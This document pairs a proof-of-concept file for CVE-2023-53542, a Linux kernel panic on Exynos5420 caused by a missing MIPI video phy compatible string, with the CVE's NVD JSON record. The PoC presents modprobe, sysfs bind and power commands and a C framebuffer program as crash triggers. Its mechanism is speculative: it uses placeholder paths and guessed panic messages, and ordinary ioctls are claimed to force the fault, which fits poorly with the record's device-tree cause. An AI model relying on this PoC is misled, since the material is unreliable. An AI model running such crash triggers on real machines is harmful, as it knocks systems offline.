CVE-2023-53542

// CVE-2023-53542 PoC - Trigger kernel panic via Exynos5420 MIPI phy // This vulnerability is triggered when the MIPI video phy driver // fails to match the device due to missing compatible string in DTS. // Method 1: Trigger via display subsystem initialization // On a system running Exynos5420 with vulnerable kernel, // the following commands can trigger the kernel panic: /* # Load the display/phy subsystem modules or access display devices modprobe exynos_mipi_video_phy # OR echo 1 > /sys/devices/platform/soc/.../mipi-video-phy/power/control # OR simply boot the system - panic occurs during boot if display is enabled */ // Method 2: Trigger via framebuffer access // If the system boots despite the issue, accessing the framebuffer // device will trigger the phy initialization and cause panic: #include <stdio.h> #include <fcntl.h> #include <sys/ioctl.h> #include <linux/fb.h> int main() { int fb_fd; struct fb_var_screeninfo vinfo; // Open the framebuffer device - this triggers MIPI phy initialization fb_fd = open("/dev/fb0", O_RDWR); if (fb_fd < 0) { perror("Cannot open framebuffer device"); return -1; } // Get variable screen information - triggers phy driver probe if (ioctl(fb_fd, FBIOGET_VSCREENINFO, &vinfo)) { perror("FBIOGET_VSCREENINFO failed"); close(fb_fd); return -1; } printf("Display: %dx%d\n", vinfo.xres, vinfo.yres); close(fb_fd); return 0; } // Method 3: Direct sysfs access to trigger phy probe /* # Trigger device probe via sysfs echo "exynos5420-mipi-video-phy" > /sys/bus/platform/drivers/.../bind # This will cause kernel panic if the compatible string is missing in DTS */ // Note: The actual trigger occurs during kernel boot when the display // subsystem initializes the MIPI DSI phy. The kernel panic manifests as: // "Unable to handle kernel paging request" or "kernel BUG at drivers/phy/..." // followed by a complete system hang requiring hardware reset.

{"cve": {"id": "CVE-2023-53542", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:49.290", "lastModified": "2026-03-21T00:26:12.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nARM: dts: exynos: Use Exynos5420 compatible for the MIPI video phy\n\nFor some reason, the driver adding support for Exynos5420 MIPI phy\nback in 2016 wasn't used on Exynos5420, which caused a kernel panic.\nAdd the proper compatible for it."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2", "versionEndExcluding": "4.14.308", "matchCriteriaId": "CE28217C-D248-4AA6-B1C0-F27B129B1BCD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.276", "matchCriteriaId": "C902FC54-DDBD-4DA6-BFEF-26889A267464"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.235", "matchCriteriaId": "13DD5E68-8CB4-46EE-9A8F-C7F6C1A84430"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.173", "matchCriteriaId": "4D810CFB-B7C5-493C-B98A-0D5F0D8A47B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.99", "matchCriteriaId": "5B8B2AC9-2F31-4A0F-96F5-7E26B50B27BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.16", "matchCriteriaId": "0FD95FDA-6525-4B13-B3FB-49D9995FD8ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.3", "matchCriteriaId": "88C67289-22AD-4CA9-B202-5F5A80E5BA4B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/199624f3144d79fab1cff533ce6a4b82390520a3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/29961ee63dd676cc67f7c00f76faa21e11f0d7c6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2e68a0f7bc576318a58335c31c542b358bc63f83", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/537bdfc1a67836fbd68bbe4210bc380f72cca47f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5d5aa219a790d61cad2c38e1aa32058f16ad2f0b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c075aa3467a799855a92289a3c619afc0a2ad193", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f10001af0f7246cf3e43530d25f8d59a8db10df6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f2a6198f5ed7d6e4e06d87a4de007f2e45cc9583", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}